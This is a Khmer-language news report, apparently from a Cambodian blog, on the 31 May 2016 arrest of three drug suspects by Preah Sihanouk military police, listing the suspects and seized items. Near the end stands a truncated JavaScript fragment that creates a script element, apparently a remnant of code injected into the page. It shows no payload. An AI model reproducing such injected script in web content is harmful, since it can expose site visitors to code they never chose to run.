ព្រឹតិ្តការណ៍ថ្មីៗ

កម្លាំងកងរាជអាវុធហត្ថខេត្តព្រះសីហនុ ឃាត់ខ្លួនជនសង្ស័យបីនាក់ ពាក់ព័ន្ធជាមួយសារធាតុញៀន

1 ឆ្នាំ មុន 0 តូ សុផល

ព្រះសីហនុៈ នៅវេលាម៉ោង ១៣ និង៣០នាទី ថ្ងៃទី៣១ ខែឧសភា ឆ្នាំ២០១៦ កម្លាំងកងរាជអាវុធហត្ថខេត្តព្រះសីហនុ បានធ្វើការបង្ក្រាបករណីរក្សាទុក និងប្រើប្រាស់ នូវសារធាតុញៀន ស្ថិតនៅចំណុច ក្រុម ១៧ .ភូមិ ១ ឃុំទំនប់រលក ស្រុកស្ទឹងហាវ ក្រុង_ ខេត្តព្រះសីហនុ។ បើតាមសំដីភ្នាក់ងារ GRK News បានអោយដឹងថា

កម្លាំងអាវុធហត្ថខេត្តព្រះសីហនុ បានធ្វើការឃាត់ខ្លួនបានជនសង្ស័យចំនួនបីនាក់ ដែលមានឈ្មោះ ៖
០១. ស សុវណ្ណ ភេទប្រុស អាយុ ៥៧ឆាំ្ន ជនជាតិ ខ្មែរ .មុខរបរ ដឹកដូងប្រេងលក់ រស់នៅក្រុម ១៧ ភូមិ០១ ឃុំទំនប់រលក ស្រុកស្ទឺងហាវ ខេត្តព្រះសីហនុ។
០២. កៅ រិទិ្ធ ភេទប្រុស អាយុ ៣០ឆាំ្ន ជនជាតិ ខ្មែរ .មុខរបរ នេសាទ រស់នៅក្រុម ៤ ភូមិ០៣ ឃុំអូរត្រេះ ស្រុកស្ទឺងហាវ ខេត្តព្រះសីហនុ។
០៣. ពេជ្រ រាជ្យ ភេទប្រុស អាយុ ២២ឆាំ្ន ជនជាតិ ខ្មែរ .មុខរបរ ជាងភ្លើង រស់នៅក្រុម០១
ភូមិ០៣ ឃុំអូរត្រេះ ស្រុកស្ទឺងហាវ ខេត្តព្រះសីហនុ។
វត្ថុតាងចាប់យករួមមាន៖
០១. ម្សៅក្រាមពណ៌សថ្លា ចំនួន០៣កញ្ចប់
០២. ទូរស័ព្ទដៃចំនួន០២គ្រឿង
០៣. ម៉ូតូចំនួន ០១គ្រឿង
០៤. ដបជក់ចំនួនមួយ
០៥. កាំបិតចុងស្រួចចំនួនពីរ
០៦.ប្រាក់រៀលចំនួនប៉ែតសិបពីរម៉ឺនរៀល
០៧. ប្រាក់បាតចំនួន ៦០០បាត
០៨.ប្រាក់ដុល្លា១៧៥$
ជនសង្ស័យ និងវត្ថុតាងខាងលើត្រូវកម្លាំងអាវុធហត្ថខេត្តព្រះសីហនុ កំពុងកសាងសំណុំរឿង ដើម្បីចាត់ការបន្តតាមនីតិវិធី ។

 

image imagevar d=document;var s=d.createElement(‘script’);

បន្ថែមយោបល់របស់អ្នក

យោបល់

 

 

%d bloggers like this: